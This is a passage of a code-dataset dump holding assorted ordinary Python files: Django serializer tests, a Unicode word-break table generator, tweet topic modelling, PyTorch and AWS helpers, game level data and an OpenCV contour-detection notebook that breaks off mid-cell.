class\nrenderer=JSONRenderer()\nrendered_game1=renderer.render(game_serializer1.data)\nrendered_game2=renderer.render(game_serializer2.data)\nprint(rendered_game1)\nprint(rendered_game2)\n\n\n# from serialized data to the population of a Game instance\njson_string_for_new_game='{\"name\":\"name_1\",\"release_date\":\"2017-08-15T03:02:00.883334Z\",\"game_category\":\"3D RPG\",\"played\":false}'\n# convert the string to bytes\njson_bytes_for_new_game=bytes(json_string_for_new_game,encoding='UTF-8')\n# The django.utils.six.BytesIO class provides a buffered I/O implementation using an inmemory bytes buffer.\nstream_for_new_game=BytesIO(json_bytes_for_new_game)\n\n# We can easily deserialize and parse a stream into the Python models with the help of the rest_framework.parsers.JSONParser class\nparser=JSONParser() # create an instance of this class\n# Parses the stream into Python native datatypes and save the results in the parsed_new_game variable\nparsed_new_game=parser.parse(stream_for_new_game)\nprint(parsed_new_game)\n\nnew_game_seralizer=GameSerializer(data=parsed_new_game)\n# Note that we must always all is_valid before we attempt to access the serialized data representation when we pass a data keyword arguemnt\n# in the creation of a serializer\nif new_game_seralizer.is_valid():\n # calls the save method that inserts the correspoinding row in the database and returns a fully populated Game instance, saved in the new_game local variable\n new_game=new_game_seralizer.save()\n print('test')\n print(new_game.name)","sub_path":"gamesAPI/testSerializer.py","file_name":"testSerializer.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102733178","text":"#!/usr/bin/env python3\n\n# Copyright 2016 Patrick O. Perry.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport math\n\ntry:\n import property\n import unicode_data\nexcept ModuleNotFoundError:\n from util import property\n from util import unicode_data\n\n\nWORD_BREAK_PROPERTY = \"data/ucd/auxiliary/WordBreakProperty.txt\"\nPROP_LIST = \"data/ucd/PropList.txt\"\nDERIVED_CORE_PROPERTIES = \"data/ucd/DerivedCoreProperties.txt\"\n\ncode_props = property.read(WORD_BREAK_PROPERTY)\nword_break_property = property.read(WORD_BREAK_PROPERTY, sets=True)\n\nprop_list = property.read(PROP_LIST, sets=True)\nwhite_space = prop_list['White_Space']\n\nderived_core_properties = property.read(DERIVED_CORE_PROPERTIES, sets=True)\ndefault_ignorable = derived_core_properties['Default_Ignorable_Code_Point']\n\n# add the default ignorables to the white space category\nwhite_space = white_space.union(default_ignorable)\n\nletter = set()\n#mark = set()\nnumber = set()\nother = set()\npunctuation = set()\nsymbol = set()\nletter_cats = set(('Ll', 'Lm', 'Lo', 'Lt', 'Lu', 'Nl'))\n#mark_cats = set(('Mc', 'Me', 'Mn'))\nnumber_cats = set(('Nd', 'No')) # Note: Nl in 'letter'\nother_cats = set(('Cc', 'Cf', 'Cs', 'Co', 'Cn'))\npunctuation_cats = set(('Pc', 'Pd', 'Pe', 'Pf', 'Pi', 'Po', 'Ps'))\nsymbol_cats = set(('Sc', 'Sk', 'Sm', 'So'))\n\nfor code in range(len(unicode_data.uchars)):\n u = unicode_data.uchars[code]\n if u is None or u.category in other_cats:\n other.add(code)\n elif u.category in letter_cats:\n letter.add(code)\n# elif u.category in mark_cats:\n# mark.add(code)\n elif u.category in number_cats:\n number.add(code)\n elif u.category in punctuation_cats:\n punctuation.add(code)\n elif u.category in symbol_cats:\n symbol.add(code)\n\n# reclassify legacy punctuation as 'Symbol'\nfor ch in ['#', '%', '&', '@']:\n punctuation.remove(ord(ch))\n symbol.add(ord(ch))\n # fullwidth versions\n wch = 0xFEE0 + ord(ch)\n punctuation.remove(wch)\n symbol.add(wch)\n\n\nprop_names = set(code_props)\nprop_names.remove(None)\n\nassert 'Letter' not in prop_names\nassert 'Mark' not in prop_names\nassert 'Number' not in prop_names\nassert 'Other' not in prop_names\nassert 'Punctuation' not in prop_names\nassert 'Symbol' not in prop_names\nassert 'White_Space' not in prop_names\nprop_names.add('Letter')\nprop_names.add('Number')\n#prop_names.add('Mark')\nprop_names.add('Other')\nprop_names.add('Punctuation')\nprop_names.add('Symbol')\nprop_names.add('White_Space')\n\nfor code in range(len(code_props)):\n if code_props[code] is None:\n if code in white_space:\n code_props[code] = 'White_Space'\n elif code in letter:\n code_props[code] = 'Letter'\n# elif code in mark:\n# code_props[code] = 'Mark'\n elif code in number:\n code_props[code] = 'Number'\n elif code in other:\n code_props[code] = 'Other'\n elif code in punctuation:\n code_props[code] = 'Punctuation'\n elif code in symbol:\n code_props[code] = 'Symbol'\n\n# override the hyphen property (default is 'Punctuation')\nprop_names.add('Hyphen')\ncode_props[0x002D] = 'Hyphen' # HYPHEN-MINUS\ncode_props[0x058A] = 'Hyphen' # ARMENIAN HYPHEN\ncode_props[0x05BE] = 'Hyphen' # HEBREW PUNCTUATION MAQAF\ncode_props[0x1400] = 'Hyphen' # CANADIAN SYLLABICS HYPHEN\ncode_props[0x1806] = 'Hyphen' # MONGOLIAN TODO SOFT HYPHEN\ncode_props[0x2010] = 'Hyphen' # HYPHEN\ncode_props[0x2011] = 'Hyphen' # NON-BREAKING HYPHEN\ncode_props[0x2E17] = 'Hyphen' # DOUBLE OBLIQUE HYPHEN\ncode_props[0x2E1A] = 'Hyphen' # HYPHEN WITH DIAERESIS\ncode_props[0x2E40] = 'Hyphen' # DOUBLE HYPHEN\ncode_props[0x30A0] = 'Hyphen' # KATAKANA-HIRAGANA DOUBLE HYPHEN\ncode_props[0xFE63] = 'Hyphen' # SMALL HYPHEN-MINUS\ncode_props[0xFF0D] = 'Hyphen' # FULLWIDTH HYPHEN-MINUS\n\n# extra MidLetter properties\n# TR#29: \"Some or all of the following characters may be tailored to be in\n# MidLetter, depending on the environment: \ncode_props[0x055A] = 'MidLetter' # ARMENIAN APOSTROPHE\ncode_props[0x0F0B] = 'MidLetter' # TIBETAN MARK INTERSYLLABIC TSHEG\ncode_props[0x201B] = 'MidLetter' # SINGLE HIGH-REVERSED-9 QUOTATION MARK\ncode_props[0x30FB] = 'MidLetter' # KATAKANA MIDDLE DOT\n\n# make sure we didn't miss anything\nfor code in range(len(code_props)):\n if code_props[code] is None:\n u = unicode_data.uchars[code]\n print('Uncagetorized code point:')\n print('U+{:04X}'.format(code), u.category, u.name)\n assert False\n\nprop_vals = {}\nprop_vals['None'] = 0;\nfor p in sorted(prop_names):\n prop_vals[p] = len(prop_vals)\n\n\ndef compute_tables(block_size):\n nblock = len(code_props) // block_size\n stage1 = [None] * nblock\n stage2 = []\n stage2_dict = {}\n for i in range(nblock):\n begin = i * block_size\n end = begin + block_size\n block = tuple(code_props[begin:end])\n if block in stage2_dict:\n j = stage2_dict[block]\n else:\n j = len(stage2)\n stage2_dict[block] = j\n stage2.append(block)\n stage1[i] = j\n return (stage1,stage2)\n\n\ndef stage1_item_size(nstage2):\n nbyte = math.ceil(math.log(nstage2, 2) / 8)\n size = 2**math.ceil(math.log(nbyte, 2))\n return size\n\npage_size = 4096\nblock_size = 256\n\nnbytes = {}\n\nbest_block_size = 1\nsmallest_size = len(code_props)\n\nfor i in range(1,17):\n block_size = 2**i\n stage1,stage2 = compute_tables(block_size)\n\n nbyte1 = len(stage1) * stage1_item_size(len(stage2))\n nbyte2 = len(stage2) * block_size\n\n nbyte1 = math.ceil(nbyte1 / page_size) * page_size\n nbyte2 = math.ceil(nbyte2 / page_size) * page_size\n nbyte = nbyte1 + nbyte2\n nbytes[block_size] = nbyte\n\n if nbyte < smallest_size:\n smallest_size = nbyte\n best_block_size = block_size\n\n\nblock_size = best_block_size\nstage1,stage2 = compute_tables(block_size)\n\ntype1_size = stage1_item_size(len(stage2))\n\nif type1_size == 1:\n type1 = 'uint8_t'\nelif type1_size == 2:\n type1 = 'uint16_t'\nelif type1_size == 4:\n type1 = 'uint32_t'\nelse:\n type1 = 'uint64_t'\n\ntype2 = 'int8_t'\n\n\n# Write wordbreakprop.h to stdout\n\nprint(\"/* This file is automatically generated. DO NOT EDIT!\")\nprint(\" Instead, edit gen-wordbreak.py and re-run. */\")\nprint(\"\")\nprint(\"/*\")\nprint(\" * Unicode Word_Break property values.\")\nprint(\" *\")\nprint(\" * Defined in UAX #29 \\\"Unicode Text Segmentation\\\"\")\nprint(\" *\")\nprint(\" * http://www.unicode.org/reports/tr29/\")\nprint(\" *\")\nprint(\" * Section 4.1, Table 3.\")\nprint(\" *\")\nprint(\" *\")\nprint(\" * We use the two-stage lookup strategy described at\")\nprint(\" *\")\nprint(\" * http://www.strchr.com/multi-stage_tables\")\nprint(\" *\")\nprint(\" */\")\nprint(\"\")\nprint(\"#ifndef WORDBREAKPROP_H\")\nprint(\"#define WORDBREAKPROP_H\")\nprint(\"\")\nprint(\"#include \")\nprint(\"\")\nprint(\"enum word_break_prop {\")\nprint(\"\\tWORD_BREAK_NONE = 0\", end=\"\")\nfor prop in sorted(prop_names):\n print(\",\\n\\tWORD_BREAK_\" + prop.upper() + \" = \" + str(prop_vals[prop]),\n end=\"\")\nprint(\"\\n};\")\nprint(\"\")\nprint(\"static const \" + type1 + \" word_break_stage1[] = {\")\nfor i in range(len(stage1) - 1):\n if i % 16 == 0:\n print(\"/* U+{:04X} */\".format(i * block_size), end=\"\")\n print(\"{0: >3},\".format(stage1[i]), end=\"\")\n if i % 16 == 15:\n print(\"\")\nprint(\"{0: >3}\".format(stage1[len(stage1) - 1]))\nprint(\"};\")\nprint(\"\")\nprint(\"static const \" + type2 + \" word_break_stage2[][\" +\n str(block_size) + \"] = {\")\n#for i in range(len(stage2)):\nfor i in range(0,len(stage2)):\n print(\" /* block \" + str(i) + \" */\")\n print(\" {\", end=\"\")\n for j in range(block_size):\n print(\"{0: >3}\".format(prop_vals[stage2[i][j]]), end=\"\")\n if j + 1 == block_size:\n print(\"\\n }\", end=\"\")\n else:\n print(\",\", end=\"\")\n if j % 16 == 15:\n print(\"\\n \", end=\"\")\n if i + 1 != len(stage2):\n print(\",\\n\")\n else:\n print(\"\")\nprint(\"};\")\n\nprint(\"\")\nprint(\"static int word_break(int32_t code)\")\nprint(\"{\")\nprint(\"\\tconst int32_t block_size = \" + str(block_size) + \";\")\nprint(\"\\t\" + type1 + \" i = word_break_stage1[code / block_size];\")\nprint(\"\\treturn word_break_stage2[i][code % block_size];\")\nprint(\"}\")\nprint(\"\")\nprint(\"#endif /* WORDBREAKPROP_H */\")\n","sub_path":"src/corpus/util/gen-wordbreak.py","file_name":"gen-wordbreak.py","file_ext":"py","file_size_in_byte":8760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14367815","text":"from zope.i18nmessageid import MessageFactory\nfrom zope.i18n import translate\nfrom zope.i18nmessageid import Message\n\nimport six\n\n\nPloneMessageFactory = MessageFactory('plone')\n\nif six.PY2:\n def safe_unicode(value):\n if isinstance(value, unicode):\n return value\n elif isinstance(value, str):\n try:\n return unicode(value, 'utf-8')\n except UnicodeDecodeError:\n return unicode(value, 'utf-8', 'ignore')\n return str(value)\nelse:\n def safe_unicode(value):\n return value\n\n\ndef recursiveTranslate(message, **kwargs):\n \"\"\"translates also the message mappings before translating the message.\n if kwargs['REQUEST'] is None, return the message untranslated\n \"\"\"\n\n request = kwargs.get('REQUEST',None)\n\n map = message.mapping\n if map:\n for key in map.keys():\n if type(map[key]) == Message:\n map[key] = translate(map[key], context=request)\n\n return translate(message, context=request)\n","sub_path":"Products/validation/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307223625","text":"from django.test import TestCase\n\n# Create your tests here.\n# -*- coding: utf-8 -*-\nimport re\n\na = re.match('^(?!_)(?!.*?_$)[a-zA-Z0-9_\\u4e00-\\u9fa5]+$', '123')\nif a == None:\n print(\"hi\")\nprint(a)\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nengine = create_engine(\"mysql+pymysql://root:root@localhost:3306/ly\")\nsql = '''select * from tb_login;'''\ndf = pd.read_sql_query(sql, engine)\nprint(df)\ndf = pd.DataFrame({'id': [1, 2, 3, 4], 'num': [12, 34, 56, 89]})\ndf.to_sql('hi', engine, if_exists='append', index=False)\n\ndf = pd.read_csv(r'./page.csv', encoding='GBK', sep=',')\ndf.to_sql('page', engine, if_exists='append', index=False)\n\n\n","sub_path":"backend/love/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374439269","text":"import socket\nimport json \nimport hashlib\n\n# sock=socket.socket()\n# sock.bind(('192.168.31.194',65320))\n# sock.listen(5)\n\n# while 1:\n# print('服务器工作中。。。。')\n# conn,addr=sock.accept()\n# while 1:\n# data=conn.recv(1024).decode('utf8')\n# file_info=json.loads(data)\n# print(file_info)\n \n# action=file_info.get('action')\n# filename=file_info.get('filename')\n# filesize=file_info.get('filesize')\n \n# conn.send(b'200')\n# res=filename.split('\\\\')[-1]\n \n \n# with open('put/'+res,'ab') as f:\n# recv_data_length=0\n# all_data=b''\n# while recv_data_length bool:\n # empty tree\n if not root: \n return True\n # without children\n if not root.left and not root.right: \n return True\n # with only right child\n if not root.left:\n if self.isValidBST(root.right):\n node = root.right\n while node.left:\n node = node.left\n if node.val > root.val:\n return True\n else:\n return False\n else:\n return False\n # with only left child\n if not root.right:\n if self.isValidBST(root.left):\n node = root.left\n while node.right:\n node = node.right\n if node.val < root.val:\n return True\n else:\n return False\n else:\n return False\n # with both children\n if self.isValidBST(root.left):\n node = root.left\n while node.right:\n node = node.right\n if node.val >= root.val:\n return False\n else:\n return False\n if self.isValidBST(root.right):\n node = root.right\n while node.left:\n node = node.left\n if node.val <= root.val:\n return False\n else:\n return False\n return True\n \n # Recursion\n def isValidBST(self, root: TreeNode) -> bool:\n def helper(node, lower=float('-inf'), upper=float('inf')):\n if not node:\n return True\n val = node.val\n if not lower < val < upper:\n return False\n if not helper(node.left, lower, val):\n return False\n if not helper(node.right, val, upper):\n return False\n return True\n return helper(root)\n \n # Iteration\n def isValidBST(self, root: TreeNode) -> bool:\n if not root: return True\n stack = [(root, float('-inf'), float('inf'))]\n while stack:\n node, lower, upper = stack.pop()\n if not node:\n continue\n val = node.val\n if not lower < val < upper:\n return False\n stack.append((node.left, lower, val))\n stack.append((node.right, val, upper))\n return True\n\n # Inorder traversal\n def isValidBST(self, root: TreeNode) -> bool:\n output = self.inOrder(root)\n for i in range(1, len(output)):\n if output[i - 1] >= output[i]:\n return False\n return True\n def inOrder(self, root):\n if not root: return []\n return self.inOrder(root.left) + [root.val] + self.inOrder(root.right)\n\n","sub_path":"98.validate-binary-search-tree.py","file_name":"98.validate-binary-search-tree.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"478012894","text":"import re\nimport nltk\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.decomposition import LatentDirichletAllocation\n\nnltk.download('stopwords')\nimport pandas as pd\n\n\ndef clean_all_tweets_apply_model(df, curr_1, curr_2, ccypair):\n # Identifying retweets\n df['is_retweet'] = df['Message'].apply(lambda x: x[:2] == 'RT')\n df['is_retweet'].sum()\n\n # Most repeated tweets, top 10\n res = df.groupby(['Message']).size().reset_index(name='Freq').sort_values('Freq', ascending=False).head(10)\n res.reset_index(drop=True, inplace=True)\n\n def retweets(tweet):\n return re.findall('(?<=RT\\s)(@[A-Za-z]+[A-Za-z0-9-_]+)', tweet)\n\n def mentions(tweet):\n return re.findall('(??[\\\\]^_`{|}~•@'\n\n # cleaning master function\n def clean_tweet(tweet, bigrams=False):\n tweet = remove_users(tweet)\n tweet = remove_links(tweet)\n tweet = tweet.lower() # lower case\n tweet = re.sub('[' + my_punctuation + ']+', ' ', tweet) # strip punctuation\n tweet = re.sub('\\s+', ' ', tweet) # remove double spacing\n tweet = re.sub('([0-9]+)', '', tweet) # remove numbers\n tweet = re.sub(curr_1, '', tweet) # remove numbers\n tweet = re.sub(curr_2, '', tweet) # remove numbers\n tweet = re.sub(ccypair, '', tweet) # remove numbers\n\n tweet_token_list = [word for word in tweet.split(' ')\n if word not in my_stopwords] # remove stopwords\n\n # tweet_token_list = [word_rooter(word) if '#' not in word else word\n # for word in tweet_token_list] # apply word rooter\n if bigrams:\n tweet_token_list = tweet_token_list + [tweet_token_list[i] + '_' + tweet_token_list[i + 1]\n for i in range(len(tweet_token_list) - 1)]\n tweet = ' '.join(tweet_token_list)\n return tweet\n\n df['clean_tweet'] = df.Message.apply(clean_tweet)\n\n # Applying Topic Modeling\n # the vectorizer object will be used to transform text to vector form\n vectorizer = CountVectorizer(token_pattern='\\w+|\\$[\\d\\.]+|\\S+')\n\n # apply transformation\n tf = vectorizer.fit_transform(df['clean_tweet']).toarray()\n\n # tf_feature_names tells us what word each column in the matric represents\n tf_feature_names = vectorizer.get_feature_names()\n\n number_of_topics = 5\n\n model = LatentDirichletAllocation(n_components=number_of_topics, random_state=0)\n model.fit(tf)\n\n def display_topics(model, feature_names, no_top_words):\n topic_dict = {}\n for topic_idx, topic in enumerate(model.components_):\n topic_dict[\"Topic %d words\" % (topic_idx)] = ['{}'.format(feature_names[i])\n for i in topic.argsort()[:-no_top_words - 1:-1]]\n topic_dict[\"Topic %d weights\" % (topic_idx)] = ['{:.1f}'.format(topic[i])\n for i in topic.argsort()[:-no_top_words - 1:-1]]\n return pd.DataFrame(topic_dict)\n\n no_top_words = 10\n lda_res = display_topics(model, tf_feature_names, no_top_words)\n\n # Log Likelyhood: Higher the better\n print(\"Log Likelihood: \", model.score(tf))\n\n # Perplexity: Lower the better. Perplexity = exp(-1. * log-likelihood per word)\n print(\"Perplexity: \", model.perplexity(tf))\n\n log_likelihodd = model.score(tf)\n perplexity = model.perplexity(tf)\n\n return res, hashtags_list_df, lda_res, log_likelihodd, perplexity","sub_path":"clean_tweets.py","file_name":"clean_tweets.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"433053586","text":"from typing import List\n\nfrom .....source_shared.base import Base\nfrom .....utilities.byte_io_mdl import ByteIO\nfrom .model import Model\n\n\nclass BodyPart(Base):\n def __init__(self):\n self.models = [] # type: List[Model]\n\n def read(self, reader: ByteIO):\n entry = reader.tell()\n model_count, model_offset = reader.read_fmt('II')\n\n with reader.save_current_pos():\n reader.seek(entry + model_offset)\n for _ in range(model_count):\n model = Model()\n model.read(reader)\n self.models.append(model)\n","sub_path":"source1/vtx/v6/structs/bodypart.py","file_name":"bodypart.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89731009","text":"\n\nfrom xai.brain.wordbase.nouns._byway import _BYWAY\n\n#calss header\nclass _BYWAYS(_BYWAY, ):\n\tdef __init__(self,): \n\t\t_BYWAY.__init__(self)\n\t\tself.name = \"BYWAYS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"byway\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_byways.py","file_name":"_byways.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"342044775","text":"import logging\r\nimport os\r\nimport torch\r\nimport argparse\r\nimport json\r\nimport numpy as np\r\nimport sys\r\n\r\n\r\ndef app_path():\r\n \"\"\"Returns the base application path.\"\"\"\r\n if hasattr(sys, 'frozen'):\r\n # Handles PyInstaller\r\n return os.path.dirname(sys.executable).replace(\"\\\\\", \"/\")\r\n return os.path.dirname(__file__).replace(\"\\\\\", \"/\")\r\n\r\n\r\ndef get_args(filename='commandline_args.txt'):\r\n parser = argparse.ArgumentParser()\r\n args = parser.parse_args()\r\n with open(filename, 'r') as f:\r\n args.__dict__ = json.load(f)\r\n return args\r\n\r\n\r\ndef get_logger():\r\n logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\r\n datefmt='%m/%d/%Y %H:%M:%S',\r\n level=logging.INFO)\r\n return logging.getLogger(__name__)\r\n\r\n\r\ndef set_environ():\r\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\n\r\ndef label_from_output(output):\r\n _, top_i = output.data.topk(1)\r\n return top_i[0]\r\n\r\n\r\n# returns a python float\r\ndef to_scalar(var):\r\n return var.view(-1).data.tolist()[0]\r\n\r\n\r\n# return the argmax as a python int\r\ndef argmax(vec):\r\n _, idx = torch.max(vec, 1)\r\n return to_scalar(idx)\r\n\r\n\r\n# Compute log sum exp in a numerically stable way for the forward algorithm\r\ndef log_sum_exp(vec):\r\n max_score = vec[0, argmax(vec)]\r\n max_score_broadcast = max_score.view(1, -1).expand(1, vec.size()[1])\r\n return max_score + torch.log(torch.sum(torch.exp(vec - max_score_broadcast)))\r\n\r\n\r\ndef adjust_learning_rate(optimizer, t=0.9):\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] *= t\r\n\r\n\r\ndef get_learning_rate(optimizer):\r\n lr = []\r\n for param_group in optimizer.param_groups:\r\n lr.append(param_group['lr'])\r\n return lr\r\n\r\n# label转独热编码\r\ndef one_hot(y, label_num=2):\r\n label = torch.LongTensor(np.zeros(label_num)).to(y.device)\r\n for i in range(label_num):\r\n if i == float(y[0]):\r\n label[i] = 1\r\n return label\r\n\r\n\r\ndef build():\r\n # SETUP_PATH = app_path()\r\n PyInstaller.__main__.run([\r\n '--name=%s' % \"main\", # 生成的exe文件名\r\n ['--onedir', '--onefile'][0], # 单个目录 or 单个文件\r\n '--noconfirm', # Replace output directory without asking for confimation\r\n ['--windowed', '--console'][1],\r\n # '--add-binary=./python3.dll;.', # 外部的包引入\r\n # '--add-binary=%s' % SETUP_PATH + '/config/logging.yaml;config', # 配置项\r\n # '--add-data=%s' % SETUP_PATH + '/config/config.ini;config', # 分号隔开,前面是添加路径,后面是添加到哪个目录\r\n # '--hidden-import=%s' % 'sqlalchemy.ext.baked',\r\n # '--hidden-import=%s' % 'frozen_dir', # 手动添加包,用于处理 module not found\r\n 'main.py', # 入口文件\r\n ])\r\n\r\n\r\nif __name__ == '__main__':\r\n import PyInstaller.__main__\r\n build()","sub_path":"process_control.py","file_name":"process_control.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"508113674","text":"import boto3\nfrom AWSWrapper.Instance import Instance\n\n\nec2_resource = boto3.resource('ec2')\nec2_client = boto3.client('ec2')\n\n\nclass Instances:\n\n def __init__(self):\n self.instance_list = []\n self.add_existing_instances()\n\n def add_existing_instances(self):\n for instance in ec2_resource.instances.all():\n self.instance_list.append(Instance(instance.id))\n\n\n def get_all_info(self):\n instances_info = {}\n\n for instance in self.instance_list:\n instances_info[instance.instance_id] = instance.get_info()\n return instances_info\n\n # Add key pair functionality to both #\n def launch_named_instance(self, name, image_id):\n instance = ec2_resource.create_instances(\n ImageId=image_id,\n MaxCount=1,\n MinCount=1,\n TagSpecifications=[\n {\n 'ResourceType': 'instance',\n 'Tags': {\n 'Key': 'Name',\n 'Value': name\n }\n }\n ]\n )\n\n def launch_instance(self, image_id):\n instance = ec2_resource.create_instances(\n ImageId=image_id,\n MaxCount=1,\n MinCount=1\n )\n","sub_path":"AWSWrapper/Instances.py","file_name":"Instances.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"110972042","text":"class LevelDef:\n def __init__(self, aName = \"???\"):\n self.name = aName;\n self.plusNumber = 1;\n self.minusNumber = 1;\n self.ghostEntries = list();\n self.diamondDropAmount = 1;\n self.ghostsDefeatedForDiamondDrop = 1;\n self.totalSeconds = 60;\n self.enemyAmount = 1;\n\nglobal LIST;\nLIST = list();\n \n \n#This is the way to add levels:\n\nlv = LevelDef(\"1: positivos\");\nlv.plusNumber = 1;\nlv.minusNumber = 1;\nlv.ghostEntries = [1,2,3,4,5];\nlv.diamondDropAmount = 4;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 1;\nLIST.append(lv);\n\n#TODO: Add more levels here:\n\nlv = LevelDef(\"2: negativos\");\nlv.plusNumber = 1;\nlv.minusNumber = 1;\nlv.ghostEntries = [-1,-2,-3,-4,-5];\nlv.diamondDropAmount = 4;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 1;\nLIST.append(lv);\n\nlv = LevelDef(\"3: negativos y positivos\");\nlv.plusNumber = 1;\nlv.minusNumber = 1;\nlv.ghostEntries = [1,-2,3,-4,5];\nlv.diamondDropAmount = 2;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);\n\nlv = LevelDef(\"4: yendo hacia negativos por accidente\");\nlv.plusNumber = 1;\nlv.minusNumber = 4;\nlv.ghostEntries = [3,9,7,3,11];\nlv.diamondDropAmount = 2;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 1;\nLIST.append(lv);\n\nlv = LevelDef(\"5: manejo de paridades y desparidades\");\nlv.plusNumber = 3;\nlv.minusNumber = 2;\nlv.ghostEntries = [-3,-7,8,12,17,6];\nlv.diamondDropAmount = 2;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);\n\n\nlv = LevelDef(\"6: manejo de paridades y desparidades mas dificil\");\nlv.plusNumber = 5;\nlv.minusNumber = 3;\nlv.ghostEntries = [-4,-8,11,15,-17,8];\nlv.diamondDropAmount = 3;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);\n\n\n\nlv = LevelDef(\"7: pares y medio complicado\");\nlv.plusNumber = 6;\nlv.minusNumber = 4;\nlv.ghostEntries = [2,-3,11,-15,-13,5,16];\nlv.diamondDropAmount = 3;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);\n\n\n\nlv = LevelDef(\"8: ultimo piso, todo mal, muchos fantasmas, numeros altos, poco tiempo, restos, todo\");\nlv.plusNumber = 4;\nlv.minusNumber = 8;\nlv.ghostEntries = [43,-55,37,-57,-43,35,67,79,81];\nlv.diamondDropAmount = 4;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);","sub_path":"test/113.py","file_name":"113.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"599911901","text":"\n# coding: utf-8\n\n# **Image segmentation** refers to the partition of image into a set of regions that represent meaningful areas of the image. It has two objectives. (1) Decomposition of images into parts for further analysis; (2) perform change of a representation.\n\n# In[1]:\n\n\nimport cv2\nimport urllib\nfrom skimage import io, util\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nfrom IPython.display import display\nget_ipython().magic(u'matplotlib inline')\nplt.rcParams['figure.figsize'] = (10.0, 10.0)\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# # Countours\n# \n# Continuos lines or curves. They are important for **object detection** and **shape analysis**\n\n# In[2]:\n\n\n#image = cv2.imread('./images/keyboard.jpg', 0)\nimage = cv2.imread('./images/keyboard.jpg')\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ngray = cv2.bilateralFilter(gray, 11, 17, 17) # blur the image (remove noise)\nio.imshow(gray)\nio.show()\n\n\n# In[3]:\n\n\ncanny = cv2.Canny(gray, 30, 200)\nio.imshow(canny)\nio.show()\n\n\n# In[4]:\n\n\n# find the contours\n\n#_, contours, hierarchy = cv2.findContours(canny, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n_, contours, hierarchy = cv2.findContours(canny.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n#cv2.imshow('Canny Edges After Contouring', edged)\n#cv2.waitKey(0)\n\nprint((\"Number of Contours found = \" + str(len(contours))))\n\n\n# In[5]:\n\n\n# Draw all contours\n# Use '-1' as the 3rd parameter to draw all countours\ncv2.drawContours(image, contours, -1, (0,255,0), 3)\n\n#cv2.imshow('Contours', image)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\nio.imshow(image)\nio.show()\n\n\n# In[6]:\n\n\n# Find contour of my TI-84\n\n\n# In[7]:\n\n\nimage = cv2.imread('./images/TI84.jpg')\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ngray = cv2.bilateralFilter(gray, 11, 17, 17) # blur the image (remove noise)\nio.imshow(gray)\nio.show()\n\n\n# In[8]:\n\n\ncanny = cv2.Canny(gray, 30, 200)\nio.imshow(canny)\nio.show()\n\n\n# In[9]:\n\n\n# find contours in the edged image, keep only the largest\n# 